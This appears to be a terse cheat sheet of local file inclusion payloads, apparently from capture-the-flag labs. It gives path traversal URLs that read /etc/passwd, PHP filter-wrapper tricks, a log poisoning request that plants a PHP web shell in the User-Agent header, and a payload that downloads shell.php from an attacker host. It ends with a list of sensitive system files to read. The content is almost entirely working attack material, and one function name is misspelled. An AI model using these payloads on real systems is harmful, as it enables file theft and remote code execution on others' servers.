lfi:
http://prueba.com/vuln.php?file=../../../../../../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd%00

wrappers:
http://10.10.66.72/?view=php://filter/convert.base64-encode/resource=cat/../index
http://10.10.66.72/?view=php://filter/convert.base64-encode/resource=dog/../../../../../var/log/apache2/access.log&ext
http://example.com/index.php?page=file:///etc/passwd%00


http://10.10.205.6/?view=../../../../etc/cat/../passwd&ext
http://10.10.205.6/?view=../../../../var/log/apache2/cat/../access.log&ext
------
User-Agent: <?php file_puts_contents('shell.php', file_get_contents('http://10.14.15.207/shell.php'));?>

------
log_poisoning:

GET /?view=../../../../var/log/apache2/cat/../access.log&ext&shell="ls" HTTP/1.1
Host: 10.10.217.131
User-Agent: <?php system($_GET['shell']);?>
Content-Length: 200

--------
windows paths:
http://webapp.thm/get.php?file=../../../../boot.ini
http://webapp.thm/get.php?file=../../../../windows/win.ini

linux paths:
/proc/ID/cmdline
/proc/schedstat
/proc/net/arp
/proc/net/fib_trie
/proc/net/tcp
/proc/stat
/proc/self/environ
/proc/sched_debug
/var/log/auth.log
/var/log/apache2/access.log
/var/log/apache2/error.log

